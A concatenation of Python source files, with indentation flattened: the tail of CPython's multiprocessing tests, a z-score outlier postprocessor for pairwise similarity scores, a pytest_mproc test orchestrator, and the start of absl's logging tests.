self.assertTrue(sem.acquire(timeout=20))
start = time.time()
res = wait([a, p.sentinel, b], expected + 20)
delta = time.time() - start
self.assertEqual(res, [p.sentinel])
self.assertLess(delta, expected + 2)
self.assertGreater(delta, expected - 2)
a.send(None)
start = time.time()
res = wait([a, p.sentinel, b], 20)
delta = time.time() - start
self.assertEqual(sorted_(res), sorted_([p.sentinel, b]))
self.assertLess(delta, 0.4)
b.send(None)
start = time.time()
res = wait([a, p.sentinel, b], 20)
delta = time.time() - start
self.assertEqual(sorted_(res), sorted_([a, p.sentinel, b]))
self.assertLess(delta, 0.4)
p.terminate()
p.join()
def test_neg_timeout(self):
from multiprocessing.connection import wait
a, b = multiprocessing.Pipe()
t = time.time()
res = wait([a], timeout=-1)
t = time.time() - t
self.assertEqual(res, [])
self.assertLess(t, 1)
a.close()
b.close()
#
# Issue 14151: Test invalid family on invalid environment
#
class TestInvalidFamily(unittest.TestCase):
@unittest.skipIf(WIN32, "skipped on Windows")
def test_invalid_family(self):
with self.assertRaises(ValueError):
multiprocessing.connection.Listener(r'\\.\test')
@unittest.skipUnless(WIN32, "skipped on non-Windows platforms")
def test_invalid_family_win32(self):
with self.assertRaises(ValueError):
multiprocessing.connection.Listener('/var/test.pipe')
#
# Issue 12098: check sys.flags of child matches that for parent
#
class TestFlags(unittest.TestCase):
@classmethod
def run_in_grandchild(cls, conn):
conn.send(tuple(sys.flags))
@classmethod
def run_in_child(cls):
import json
r, w = multiprocessing.Pipe(duplex=False)
p = multiprocessing.Process(target=cls.run_in_grandchild, args=(w,))
p.start()
grandchild_flags = r.recv()
p.join()
r.close()
w.close()
flags = (tuple(sys.flags), grandchild_flags)
print(json.dumps(flags))
def test_flags(self):
import json, subprocess
# start child process using unusual flags
prog = ('from test._test_multiprocessing import TestFlags; ' +
'TestFlags.run_in_child()')
data = subprocess.check_output(
[sys.executable, '-E', '-S', '-O', '-c', prog])
child_flags, grandchild_flags = json.loads(data.decode('ascii'))
self.assertEqual(child_flags, grandchild_flags)
#
# Test interaction with socket timeouts - see Issue #6056
#
class TestTimeouts(unittest.TestCase):
@classmethod
def _test_timeout(cls, child, address):
time.sleep(1)
child.send(123)
child.close()
conn = multiprocessing.connection.Client(address)
conn.send(456)
conn.close()
def test_timeout(self):
old_timeout = socket.getdefaulttimeout()
try:
socket.setdefaulttimeout(0.1)
parent, child = multiprocessing.Pipe(duplex=True)
l = multiprocessing.connection.Listener(family='AF_INET')
p = multiprocessing.Process(target=self._test_timeout,
args=(child, l.address))
p.start()
child.close()
self.assertEqual(parent.recv(), 123)
parent.close()
conn = l.accept()
self.assertEqual(conn.recv(), 456)
conn.close()
l.close()
p.join(10)
finally:
socket.setdefaulttimeout(old_timeout)
#
# Test what happens with no "if __name__ == '__main__'"
#
class TestNoForkBomb(unittest.TestCase):
def test_noforkbomb(self):
sm = multiprocessing.get_start_method()
name = os.path.join(os.path.dirname(__file__), 'mp_fork_bomb.py')
if sm != 'fork':
rc, out, err = test.support.script_helper.assert_python_failure(name, sm)
self.assertEqual(out, b'')
self.assertIn(b'RuntimeError', err)
else:
rc, out, err = test.support.script_helper.assert_python_ok(name, sm)
self.assertEqual(out.rstrip(), b'123')
self.assertEqual(err, b'')
#
# Issue #17555: ForkAwareThreadLock
#
class TestForkAwareThreadLock(unittest.TestCase):
# We recurisvely start processes. Issue #17555 meant that the
# after fork registry would get duplicate entries for the same
# lock. The size of the registry at generation n was ~2**n.
@classmethod
def child(cls, n, conn):
if n > 1:
p = multiprocessing.Process(target=cls.child, args=(n-1, conn))
p.start()
conn.close()
p.join(timeout=5)
else:
conn.send(len(util._afterfork_registry))
conn.close()
def test_lock(self):
r, w = multiprocessing.Pipe(False)
l = util.ForkAwareThreadLock()
old_size = len(util._afterfork_registry)
p = multiprocessing.Process(target=self.child, args=(5, w))
p.start()
w.close()
new_size = r.recv()
p.join(timeout=5)
self.assertLessEqual(new_size, old_size)
#
# Check that non-forked child processes do not inherit unneeded fds/handles
#
class TestCloseFds(unittest.TestCase):
def get_high_socket_fd(self):
if WIN32:
# The child process will not have any socket handles, so
# calling socket.fromfd() should produce WSAENOTSOCK even
# if there is a handle of the same number.
return socket.socket().detach()
else:
# We want to produce a socket with an fd high enough that a
# freshly created child process will not have any fds as high.
fd = socket.socket().detach()
to_close = []
while fd < 50:
to_close.append(fd)
fd = os.dup(fd)
for x in to_close:
os.close(x)
return fd
def close(self, fd):
if WIN32:
socket.socket(fileno=fd).close()
else:
os.close(fd)
@classmethod
def _test_closefds(cls, conn, fd):
try:
s = socket.fromfd(fd, socket.AF_INET, socket.SOCK_STREAM)
except Exception as e:
conn.send(e)
else:
s.close()
conn.send(None)
def test_closefd(self):
if not HAS_REDUCTION:
raise unittest.SkipTest('requires fd pickling')
reader, writer = multiprocessing.Pipe()
fd = self.get_high_socket_fd()
try:
p = multiprocessing.Process(target=self._test_closefds,
args=(writer, fd))
p.start()
writer.close()
e = reader.recv()
p.join(timeout=5)
finally:
self.close(fd)
writer.close()
reader.close()
if multiprocessing.get_start_method() == 'fork':
self.assertIs(e, None)
else:
WSAENOTSOCK = 10038
self.assertIsInstance(e, OSError)
self.assertTrue(e.errno == errno.EBADF or
e.winerror == WSAENOTSOCK, e)
#
# Issue #17097: EINTR should be ignored by recv(), send(), accept() etc
#
class TestIgnoreEINTR(unittest.TestCase):
@classmethod
def _test_ignore(cls, conn):
def handler(signum, frame):
pass
signal.signal(signal.SIGUSR1, handler)
conn.send('ready')
x = conn.recv()
conn.send(x)
conn.send_bytes(b'x'*(1024*1024)) # sending 1 MB should block
@unittest.skipUnless(hasattr(signal, 'SIGUSR1'), 'requires SIGUSR1')
def test_ignore(self):
conn, child_conn = multiprocessing.Pipe()
try:
p = multiprocessing.Process(target=self._test_ignore,
args=(child_conn,))
p.daemon = True
p.start()
child_conn.close()
self.assertEqual(conn.recv(), 'ready')
time.sleep(0.1)
os.kill(p.pid, signal.SIGUSR1)
time.sleep(0.1)
conn.send(1234)
self.assertEqual(conn.recv(), 1234)
time.sleep(0.1)
os.kill(p.pid, signal.SIGUSR1)
self.assertEqual(conn.recv_bytes(), b'x'*(1024*1024))
time.sleep(0.1)
p.join()
finally:
conn.close()
@classmethod
def _test_ignore_listener(cls, conn):
def handler(signum, frame):
pass
signal.signal(signal.SIGUSR1, handler)
with multiprocessing.connection.Listener() as l:
conn.send(l.address)
a = l.accept()
a.send('welcome')
@unittest.skipUnless(hasattr(signal, 'SIGUSR1'), 'requires SIGUSR1')
def test_ignore_listener(self):
conn, child_conn = multiprocessing.Pipe()
try:
p = multiprocessing.Process(target=self._test_ignore_listener,
args=(child_conn,))
p.daemon = True
p.start()
child_conn.close()
address = conn.recv()
time.sleep(0.1)
os.kill(p.pid, signal.SIGUSR1)
time.sleep(0.1)
client = multiprocessing.connection.Client(address)
self.assertEqual(client.recv(), 'welcome')
p.join()
finally:
conn.close()
class TestStartMethod(unittest.TestCase):
@classmethod
def _check_context(cls, conn):
conn.send(multiprocessing.get_start_method())
def check_context(self, ctx):
r, w = ctx.Pipe(duplex=False)
p = ctx.Process(target=self._check_context, args=(w,))
p.start()
w.close()
child_method = r.recv()
r.close()
p.join()
self.assertEqual(child_method, ctx.get_start_method())
def test_context(self):
for method in ('fork', 'spawn', 'forkserver'):
try:
ctx = multiprocessing.get_context(method)
except ValueError:
continue
self.assertEqual(ctx.get_start_method(), method)
self.assertIs(ctx.get_context(), ctx)
self.assertRaises(ValueError, ctx.set_start_method, 'spawn')
self.assertRaises(ValueError, ctx.set_start_method, None)
self.check_context(ctx)
def test_set_get(self):
multiprocessing.set_forkserver_preload(PRELOAD)
count = 0
old_method = multiprocessing.get_start_method()
try:
for method in ('fork', 'spawn', 'forkserver'):
try:
multiprocessing.set_start_method(method, force=True)
except ValueError:
continue
self.assertEqual(multiprocessing.get_start_method(), method)
ctx = multiprocessing.get_context()
self.assertEqual(ctx.get_start_method(), method)
self.assertTrue(type(ctx).__name__.lower().startswith(method))
self.assertTrue(
ctx.Process.__name__.lower().startswith(method))
self.check_context(multiprocessing)
count += 1
finally:
multiprocessing.set_start_method(old_method, force=True)
self.assertGreaterEqual(count, 1)
def test_get_all(self):
methods = multiprocessing.get_all_start_methods()
if sys.platform == 'win32':
self.assertEqual(methods, ['spawn'])
else:
self.assertTrue(methods == ['fork', 'spawn'] or
methods == ['fork', 'spawn', 'forkserver'])
def test_preload_resources(self):
if multiprocessing.get_start_method() != 'forkserver':
self.skipTest("test only relevant for 'forkserver' method")
name = os.path.join(os.path.dirname(__file__), 'mp_preload.py')
rc, out, err = test.support.script_helper.assert_python_ok(name)
out = out.decode()
err = err.decode()
if out.rstrip() != 'ok' or err != '':
print(out)
print(err)
self.fail("failed spawning forkserver or grandchild")
#
# Check that killing process does not leak named semaphores
#
@unittest.skipIf(sys.platform == "win32",
"test semantics don't make sense on Windows")
class TestSemaphoreTracker(unittest.TestCase):
def test_semaphore_tracker(self):
import subprocess
cmd = '''if 1:
import multiprocessing as mp, time, os
mp.set_start_method("spawn")
lock1 = mp.Lock()
lock2 = mp.Lock()
os.write(%d, lock1._semlock.name.encode("ascii") + b"\\n")
os.write(%d, lock2._semlock.name.encode("ascii") + b"\\n")
time.sleep(10)
'''
r, w = os.pipe()
p = subprocess.Popen([sys.executable,
'-c', cmd % (w, w)],
pass_fds=[w],
stderr=subprocess.PIPE)
os.close(w)
with open(r, 'rb', closefd=True) as f:
name1 = f.readline().rstrip().decode('ascii')
name2 = f.readline().rstrip().decode('ascii')
_multiprocessing.sem_unlink(name1)
p.terminate()
p.wait()
time.sleep(2.0)
with self.assertRaises(OSError) as ctx:
_multiprocessing.sem_unlink(name2)
# docs say it should be ENOENT, but OSX seems to give EINVAL
self.assertIn(ctx.exception.errno, (errno.ENOENT, errno.EINVAL))
err = p.stderr.read().decode('utf-8')
p.stderr.close()
expected = 'semaphore_tracker: There appear to be 2 leaked semaphores'
self.assertRegex(err, expected)
self.assertRegex(err, r'semaphore_tracker: %r: \[Errno' % name1)
class TestSimpleQueue(unittest.TestCase):
@classmethod
def _test_empty(cls, queue, child_can_start, parent_can_continue):
child_can_start.wait()
# issue 30301, could fail under spawn and forkserver
try:
queue.put(queue.empty())
queue.put(queue.empty())
finally:
parent_can_continue.set()
def test_empty(self):
queue = multiprocessing.SimpleQueue()
child_can_start = multiprocessing.Event()
parent_can_continue = multiprocessing.Event()
proc = multiprocessing.Process(
target=self._test_empty,
args=(queue, child_can_start, parent_can_continue)
)
proc.daemon = True
proc.start()
self.assertTrue(queue.empty())
child_can_start.set()
parent_can_continue.wait()
self.assertFalse(queue.empty())
self.assertEqual(queue.get(), True)
self.assertEqual(queue.get(), False)
self.assertTrue(queue.empty())
proc.join()
#
# Mixins
#
class ProcessesMixin(object):
TYPE = 'processes'
Process = multiprocessing.Process
connection = multiprocessing.connection
current_process = staticmethod(multiprocessing.current_process)
active_children = staticmethod(multiprocessing.active_children)
Pool = staticmethod(multiprocessing.Pool)
Pipe = staticmethod(multiprocessing.Pipe)
Queue = staticmethod(multiprocessing.Queue)
JoinableQueue = staticmethod(multiprocessing.JoinableQueue)
Lock = staticmethod(multiprocessing.Lock)
RLock = staticmethod(multiprocessing.RLock)
Semaphore = staticmethod(multiprocessing.Semaphore)
BoundedSemaphore = staticmethod(multiprocessing.BoundedSemaphore)
Condition = staticmethod(multiprocessing.Condition)
Event = staticmethod(multiprocessing.Event)
Barrier = staticmethod(multiprocessing.Barrier)
Value = staticmethod(multiprocessing.Value)
Array = staticmethod(multiprocessing.Array)
RawValue = staticmethod(multiprocessing.RawValue)
RawArray = staticmethod(multiprocessing.RawArray)
class ManagerMixin(object):
TYPE = 'manager'
Process = multiprocessing.Process
Queue = property(operator.attrgetter('manager.Queue'))
JoinableQueue = property(operator.attrgetter('manager.JoinableQueue'))
Lock = property(operator.attrgetter('manager.Lock'))
RLock = property(operator.attrgetter('manager.RLock'))
Semaphore = property(operator.attrgetter('manager.Semaphore'))
BoundedSemaphore = property(operator.attrgetter('manager.BoundedSemaphore'))
Condition = property(operator.attrgetter('manager.Condition'))
Event = property(operator.attrgetter('manager.Event'))
Barrier = property(operator.attrgetter('manager.Barrier'))
Value = property(operator.attrgetter('manager.Value'))
Array = property(operator.attrgetter('manager.Array'))
list = property(operator.attrgetter('manager.list'))
dict = property(operator.attrgetter('manager.dict'))
Namespace = property(operator.attrgetter('manager.Namespace'))
@classmethod
def Pool(cls, *args, **kwds):
return cls.manager.Pool(*args, **kwds)
@classmethod
def setUpClass(cls):
cls.manager = multiprocessing.Manager()
@classmethod
def tearDownClass(cls):
# only the manager process should be returned by active_children()
# but this can take a bit on slow machines, so wait a few seconds
# if there are other children too (see #17395)
t = 0.01
while len(multiprocessing.active_children()) > 1 and t < 5:
time.sleep(t)
t *= 2
gc.collect() # do garbage collection
if cls.manager._number_of_objects() != 0:
# This is not really an error since some tests do not
# ensure that all processes which hold a reference to a
# managed object have been joined.
print('Shared objects which still exist at manager shutdown:')
print(cls.manager._debug_info())
cls.manager.shutdown()
cls.manager.join()
cls.manager = None
class ThreadsMixin(object):
TYPE = 'threads'
Process = multiprocessing.dummy.Process
connection = multiprocessing.dummy.connection
current_process = staticmethod(multiprocessing.dummy.current_process)
active_children = staticmethod(multiprocessing.dummy.active_children)
Pool = staticmethod(multiprocessing.dummy.Pool)
Pipe = staticmethod(multiprocessing.dummy.Pipe)
Queue = staticmethod(multiprocessing.dummy.Queue)
JoinableQueue = staticmethod(multiprocessing.dummy.JoinableQueue)
Lock = staticmethod(multiprocessing.dummy.Lock)
RLock = staticmethod(multiprocessing.dummy.RLock)
Semaphore = staticmethod(multiprocessing.dummy.Semaphore)
BoundedSemaphore = staticmethod(multiprocessing.dummy.BoundedSemaphore)
Condition = staticmethod(multiprocessing.dummy.Condition)
Event = staticmethod(multiprocessing.dummy.Event)
Barrier = staticmethod(multiprocessing.dummy.Barrier)
Value = staticmethod(multiprocessing.dummy.Value)
Array = staticmethod(multiprocessing.dummy.Array)
#
# Functions used to create test cases from the base ones in this module
#
def install_tests_in_module_dict(remote_globs, start_method):
__module__ = remote_globs['__name__']
local_globs = globals()
ALL_TYPES = {'processes', 'threads', 'manager'}
for name, base in local_globs.items():
if not isinstance(base, type):
continue
if issubclass(base, BaseTestCase):
if base is BaseTestCase:
continue
assert set(base.ALLOWED_TYPES) <= ALL_TYPES, base.ALLOWED_TYPES
for type_ in base.ALLOWED_TYPES:
newname = 'With' + type_.capitalize() + name[1:]
Mixin = local_globs[type_.capitalize() + 'Mixin']
class Temp(base, Mixin, unittest.TestCase):
pass
Temp.__name__ = Temp.__qualname__ = newname
Temp.__module__ = __module__
remote_globs[newname] = Temp
elif issubclass(base, unittest.TestCase):
class Temp(base, object):
pass
Temp.__name__ = Temp.__qualname__ = name
Temp.__module__ = __module__
remote_globs[name] = Temp
dangling = [None, None]
old_start_method = [None]
def setUpModule():
multiprocessing.set_forkserver_preload(PRELOAD)
multiprocessing.process._cleanup()
dangling[0] = multiprocessing.process._dangling.copy()
dangling[1] = threading._dangling.copy()
old_start_method[0] = multiprocessing.get_start_method(allow_none=True)
try:
multiprocessing.set_start_method(start_method, force=True)
except ValueError:
raise unittest.SkipTest(start_method +
' start method not supported')
if sys.platform.startswith("linux"):
try:
lock = multiprocessing.RLock()
except OSError:
raise unittest.SkipTest("OSError raises on RLock creation, "
"see issue 3111!")
check_enough_semaphores()
util.get_temp_dir() # creates temp directory
multiprocessing.get_logger().setLevel(LOG_LEVEL)
def tearDownModule():
multiprocessing.set_start_method(old_start_method[0], force=True)
# pause a bit so we don't get warning about dangling threads/processes
time.sleep(0.5)
multiprocessing.process._cleanup()
gc.collect()
tmp = set(multiprocessing.process._dangling) - set(dangling[0])
if tmp:
print('Dangling processes:', tmp, file=sys.stderr)
del tmp
tmp = set(threading._dangling) - set(dangling[1])
if tmp:
print('Dangling threads:', tmp, file=sys.stderr)
remote_globs['setUpModule'] = setUpModule
remote_globs['tearDownModule'] = tearDownModule
|
guassian.py
|
# Postprocessed pair results by calculating mean/std. deviation, and finding approrpaite outliers.
# assignment args:
# - see processor/edit_distance.py
# - alternatively, just use a files list
# postprocessor args:
# - sourceSuffix (string) - Suffix used by the processor.
# - resultsSuffix (string) - Suffix used by the postprocessor.
# - deviation (number): the std. deviation of interest
# - minThreshold (number - optional): If the score above/below (depeding on "above") this value, always keep
# - above (bool): Whether we keep all those above or below this deviation.
import helpers.common as common
import helpers.io as io
from multiprocessing import Process
import math
# converts a JSON pair result into a Python object
def pairJSONToObject(json):
student1 = json["pair"][0]
student2 = json["pair"][1]
score = float(json["score"])
return common.PairResult(student1, student2, score)
# finds the mean of the data
def getMean(data):
total = 0.0
count = 0.0
for element in data:
total = total + element.score
count = count + 1.0
return total / count
# finds the std. deviation of the data
def getDeviation(data, mean):
totalDiff = 0.0
count = 0.0
for element in data:
totalDiff = totalDiff + (element.score - mean)**2.0
count = count + 1.0
normalized = totalDiff / count
return math.sqrt(normalized)
# gets the z-score of a data point
def zScore(score, mean, deviation):
return (score - mean) / deviation
# filters out result those that aren't suspicious
def filterData(data, mean, deviation, threshold, above, minThreshold):
results = []
for element in data:
z = zScore(element.score, mean, deviation)
if z <= threshold and not above:
results.append(element)
continue
if z >= threshold and above:
results.append(element)
continue
if minThreshold != None and element.score <= minThreshold and not above:
results.append(element)
continue
if minThreshold != None and element.score >= minThreshold and above:
results.append(element)
continue
return results
# creates clusters from the filtered data
def createClusters(data, filename, assignName, allowPartners, helpers):
clusters = []
for element in data:
cluster = common.Cluster(allowPartners, filename, element.score)
member1 = common.Member(element.pair[0], assignName, helpers)
member2 = common.Member(element.pair[1], assignName, helpers)
cluster.add(member1)
cluster.add(member2)
clusters.append(cluster)
return clusters
# runs an entry in parellel
def runEntry(filename, students, helpers, assignment, args, allowPartners):
# get the data
assignName = assignment.name
sourceSuffix = args["sourceSuffix"]
resultsSuffix = args["resultsSuffix"]
threshold = assignment.args["threshold"]
above = args["above"]
minThreshold = None
if assignment.args.has_key("minThreshold"):
minThreshold = assignment.args["minThreshold"]
safeFilename = common.makeFilenameSafe(filename) + sourceSuffix
filepath = helpers.getProcessedPath(assignName, safeFilename)
if filepath != None:
rawData = common.PairResults(assignName, safeFilename, helpers)
data = []
# convert into python objects
for pair in rawData.iterate():
data.append(pair)
# get the mean
mean = getMean(data)
# get the deviation
deviation = getDeviation(data, mean)
helpers.printf("{}/{}: mean {}, deviation {}\n".format(assignName, filename, mean, deviation))
# filter out data
filtered = filterData(data, mean, deviation, threshold, above, minThreshold)
# create the clusters
clusters = createClusters(filtered, filename, assignName, allowPartners, helpers)
# flush to disk
common.clustersToStandardJSON(clusters, assignName, common.makeFilenameSafe(filename) + resultsSuffix, helpers)
# all done!
helpers.printf("Finished '{}', with {} results!\n".format(assignName, len(clusters)))
# the main function
def run(students, assignments, args, helpers):
# threads to join later
threads = []
# for each assignment
for assignment in assignments:
# for each entry
assignName = assignment.name
allowPartners = assignment.args["allowPartners"]
# print progress
helpers.printf("postprocessing '{}' in parellel...\n".format(assignName))
# allow entry lists and file lists
entries = []
if assignment.args.has_key("entries"):
entries = assignment.args["entries"]
else:
if assignment.args.has_key("files"):
entries = assignment.args["files"]
for entry in entries:
# use the first source as the filename in case fo an entry
filename = entry
if assignment.args.has_key("entries"):
filename = entry["sources"][0]
# create the thread
t = Process(target=runEntry, args=(filename, students, helpers, assignment, args, allowPartners))
threads.append(t)
t.start()
# join all of the threads
for t in threads:
t.join()
# all done
return True
|
main.py
|
import resource
import socket
import sys
import time
from contextlib import suppress
from multiprocessing.managers import MakeProxyType
import _pytest.fixtures
from multiprocessing import JoinableQueue, Process, Queue
from multiprocessing.managers import SyncManager, RemoteError
from typing import List, Any, Optional, Tuple, Union, Dict
import pytest
from pytest_mproc import resource_utilization, find_free_port, AUTHKEY
from pytest_mproc.data import TestBatch, ResultTestStatus, ResultException, ResultExit, DEFAULT_PRIORITY, \
TestExecutionConstraint
from pytest_mproc.fixtures import Global, FixtureManager
from pytest_mproc.utils import BasicReporter
__all__ = ["Orchestrator"]
def _localhost():
try:
return socket.gethostbyname(socket.gethostname())
except Exception:
print(">>> Cannot get ip address of host. Return 127.0.0.1 (localhost)")
return "127.0.0.1"
# Create proxies for Queue types to be accessible from remote clients
# NOTE: multiprocessing module has a quirk/bug where passin proxies to another separate client (e.g., on
# another machine) causes the proxy to be rebuilt with a random authkey on the other side. Unless
# we override the constructor to force an authkey value, we will hit AuthenticationError's
JoinableQueueProxyBase = MakeProxyType("JoinableQueueProxy", exposed=["put", "get", "task_done", "join", "close"])
QueueProxyBase = MakeProxyType("QueueProxy", exposed=["put", "get", "task_done", "join", "close"])
class JoinableQueueProxy(JoinableQueueProxyBase):
def __init__(self, token, serializer, manager=None,
authkey=None, exposed=None, incref=True, manager_owned=False):
super().__init__(token, serializer, manager, AUTHKEY, exposed, incref, manager_owned)
class QueueProxy(QueueProxyBase):
def __init__(self, token, serializer, manager=None,
authkey=None, exposed=None, incref=True, manager_owned=False):
super().__init__(token, serializer, manager, AUTHKEY, exposed, incref, manager_owned)
class Orchestrator:
"""
class that acts as Main point of orchestration
"""
class Manager(FixtureManager):
class Value:
def __init__(self, val):
self._val = val
def value(self):
return self._val
def __init__(self, main: Optional["Orchestrator"] = None, addr: Optional[Tuple[str, int]] = None):
if not main:
# client
Orchestrator.Manager.register("register_client")
Orchestrator.Manager.register("count")
Orchestrator.Manager.register("finalize")
Orchestrator.Manager.register("JoinableQueueProxy")
else:
# server:
self._worker_count = 0
self._clients = []
self._orchestrator = main
self._finalized = False
Orchestrator.Manager.register("register_client", self._register_client)
Orchestrator.Manager.register("count", self._count)
Orchestrator.Manager.register("finalize", self._finalize)
Orchestrator.Manager.register("JoinableQueueProxy", JoinableQueue, JoinableQueueProxy)
addr = (main.host, main.port) if main else addr
super().__init__(addr=addr, as_main=main is not None)
def _register_client(self, client, count: int) -> Value:
if self._finalized:
raise Exception("Client registered after disconnect")
self._clients.append(client)
self._worker_count += count
client.start(self._orchestrator._test_q, self._orchestrator._result_q)
def _count(self):
self._finalized = True
return self.Value(self._worker_count)
def _finalize(self):
for client in self._clients:
client.join()
self._clients = []
def __init__(self, host: str = _localhost(), port = find_free_port(), is_serving_remotes: bool=False):
"""
:param num_processes: number of parallel executions to be conducted
"""
self._tests: List[TestBatch] = [] # set later
self._count = 0
self._exit_results: List[ResultExit] = []
self._session_start_time = time.time()
if is_serving_remotes:
SyncManager.register("JoinableQueueProxy", JoinableQueue, JoinableQueueProxy)
SyncManager.register("QueueProxy", Queue, QueueProxy)
self._queue_manager = SyncManager(authkey=AUTHKEY)
self._queue_manager.start()
self._test_q: JoinableQueue = self._queue_manager.JoinableQueueProxy()
self._result_q: Queue = self._queue_manager.QueueProxy()
else:
self._test_q: JoinableQueue = JoinableQueue()
self._result_q: Queue = Queue()
self._reporter = BasicReporter()
self._exit_q = JoinableQueue()
self._host = host
self._port = port
self._mp_manager = self.Manager(self)
self._is_serving_remotes = is_serving_remotes
@property
def host(self):
return self._host
@property
def port(self):
return self._port
@staticmethod
def _write_sep(s, txt):
"""
write out text to stdout surrounded by repeated character
:param s: character to repeat on either side of given text
:param txt: text to by surrounded
"""
sep_total = max((70 - 2 - len(txt)), 2)
sep_len = sep_total // 2
sep_extra = sep_total % 2
out = '%s %s %s\n' % (s * sep_len, txt, s * (sep_len + sep_extra))
sys.stdout.write(out)
def _output_summary(self, time_span: float, ucpu: float, scpu: float, unshared_mem: float):
"""
Output the summary of test execution
"""
self._write_sep('=', "STATS")
sys.stdout.write("User CPU, System CPU utilization, Add'l memory during run\n")
sys.stdout.write("---------------------------------------------------------\n")
for exit_result in self._exit_results:
if exit_result.test_count > 0:
sys.stdout.write(
f"Process Worker-{exit_result.worker_index} executed " +
f"{exit_result.test_count} tests in {exit_result.resource_utilization.time_span:.2f} " +
f"seconds; User CPU: {exit_result.resource_utilization.user_cpu:.2f}%, " +
f"Sys CPU: {exit_result.resource_utilization.system_cpu:.2f}%, " +
f"Mem consumed: {exit_result.resource_utilization.memory_consumed/1000.0}M\n")
else:
sys.stdout.write(f"Process Worker-{exit_result.worker_index} executed 0 tests\n")
sys.stdout.write("\n")
sys.stdout.write(
f"Process Coordinator executed in {time_span:.2f} seconds. " +
f"User CPU: {ucpu:.2f}%, Sys CPU: {scpu:.2f}%, " +
f"Mem consumed: {unshared_mem/1000.0}M\n"
)
length = sum([len(batch.test_ids) for batch in self._tests])
if self._count != length:
self._write_sep('!', "{} tests unaccounted for {} out of {}".format(length - self._count,
self._count, length))
sys.stdout.flush()
def _process_worker_message(self, hook, result: Union[ResultException, ResultExit, ResultTestStatus]):
"""
Process a message (as a worker) from the coordinating process
:param typ: the kind of messsage
:param data: payload for the message to be processed
"""
try:
if isinstance(result, ResultTestStatus):
if result.report.when == 'call' or (result.report.when == 'setup' and not result.report.passed):
self._count += 1
hook.pytest_runtest_logreport(report=result.report)
elif isinstance(result, ResultExit):
# process is complete, so close it and set to None
self._exit_results.append(result)
self._exit_q.put(result.worker_index)
elif isinstance(result, ResultException):
hook.pytest_internalerror(excrepr=result.excrepr, excinfo=None)
else:
raise Exception(f"Internal Error: Unknown result type: {type(result)}!!")
except Exception as e:
import traceback
traceback.print_exc()
sys.stdout.write("INTERNAL_ERROR> %s\n" % str(e))
def put_fixture(self, name, value):
self._mp_manager.put_fixture(name, value)
def fixtures(self):
return self._mp_manager._fixtures
def read_results(self, hook):
try:
result_batch: List[Union[ResultTestStatus, ResultException, ResultExit, None]] = self._result_q.get()
while result_batch is not None:
for result in result_batch:
if isinstance(result, ResultException):
hook.pytest_internalerror(excrepr=result.excrepr, excinfo=None)
else:
self._process_worker_message(hook,result)
result_batch = self._result_q.get()
except OSError:
pass
finally:
self._result_q.close()
def populate_test_queue(self, tests: List[TestBatch], end_sem):
try:
count = 0
for test_batch in tests:
# Function objects in pytest are not pickle-able, so have to send string nodeid and
# do lookup on worker side
self._test_q.put(test_batch)
count += 1
if count % 20 == 0 or count >= len(tests):
self._test_q.join()
client = self.Manager(addr=(self._host, self._port))
worker_count = client.count().value()
for index in range(worker_count):
self._test_q.put(None)
self._test_q.join()
self._test_q.close()
with suppress(RemoteError):
client.finalize()
self._result_q.put(None)
finally:
if end_sem:
end_sem.release()
def set_items(self, tests):
"""
:param tests: the items containing the pytest hooks to the tests to be run
"""
def priority(test) -> int:
return getattr(test._pyfuncitem.obj, "_pytest_priority", DEFAULT_PRIORITY)
grouped = [t for t in tests if getattr(t._pyfuncitem.obj, "_pytest_group", None)
or getattr(t._pyfuncitem, "_pytest_group", None)]
self._tests = [TestBatch([t.nodeid], priority(t)) for t in tests if t not in grouped]
groups: Dict["GroupTag", TestBatch] = {}
for test in grouped:
tag = test._pyfuncitem.obj._pytest_group if hasattr(test._pyfuncitem.obj, "_pytest_group") \
else test._pyfuncitem._pytest_group
groups.setdefault(tag, TestBatch([], tag.priority)).test_ids.append(test)
for tag, group in groups.items():
groups[tag].test_ids = [test.nodeid for test in sorted(group.test_ids, key=lambda x: priority(x))]
groups[tag].restriction = tag.restrict_to
self._tests.extend(groups.values())
self._tests = sorted(self._tests, key=lambda x: x.priority)
def run_loop(self, session):
"""
Populate test queue and continue to process messages from worker Processes until they complete
:param session: Pytest test session, to get session or config information
"""
start_rusage = resource.getrusage(resource.RUSAGE_SELF)
start_time = time.time()
# we are the root node, so populate the tests
populate_tests_process = Process(target=self.populate_test_queue, args=(self._tests, None))
populate_tests_process.start()
self.read_results(session.config.hook) # only master will read results and post reports through pytest
populate_tests_process.join(timeout=1) # should never time out since workers are done
end_rusage = resource.getrusage(resource.RUSAGE_SELF)
self._reporter.write("Shutting down..")
self._mp_manager.shutdown()
self._reporter.write("Shut down")
time_span = time.time() - start_time
rusage = resource_utilization(time_span=time_span, start_rusage=start_rusage, end_rusage=end_rusage)
sys.stdout.write("\r\n")
self._output_summary(rusage.time_span, rusage.user_cpu, rusage.system_cpu, rusage.memory_consumed)
@pytest.hookimpl(tryfirst=True)
def pytest_fixture_setup(self, fixturedef, request, _pytset=None):
result = _pytset.fixtures.pytest_fixture_setup(fixturedef, request)
if fixturedef.scope == 'global':
self._mp_manager.put(fixturedef.argname, result)
return result
|
logging_test.py
|
# Copyright 2017 The Abseil Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Unit tests for absl.logging."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import contextlib
import functools
import getpass
import io
import logging as std_logging
import os
import re
import socket
import sys
import tempfile
import threading
import time
import traceback
import unittest
from absl import flags
from absl import logging
from absl.testing import absltest
from absl.testing import flagsaver
from absl.testing import parameterized
import mock
import six
from six.moves import range # pylint: disable=redefined-builtin
FLAGS = flags.FLAGS
_StreamIO = io.StringIO if six.PY3 else io.BytesIO # pylint: disable=invalid-name
class ConfigurationTest(absltest.TestCase):
"""Tests the initial logging configuration."""
def test_logger_and_handler(self):
absl_logger = std_logging.getLogger('absl')
self.assertIs(absl_logger, logging.get_absl_logger())
self.assertTrue(isinstance(absl_logger, logging.ABSLLogger))
self.assertTrue(
isinstance(logging.get_absl_handler().python_handler.formatter,
logging.PythonFormatter))
class LoggerLevelsTest(parameterized.TestCase):
def setUp(self):
super(LoggerLevelsTest, self).setUp()
# Since these tests muck with the flag, always save/restore in case the
# tests forget to clean up properly.
# enter_context() is py3-only, but manually enter/exit should suffice.
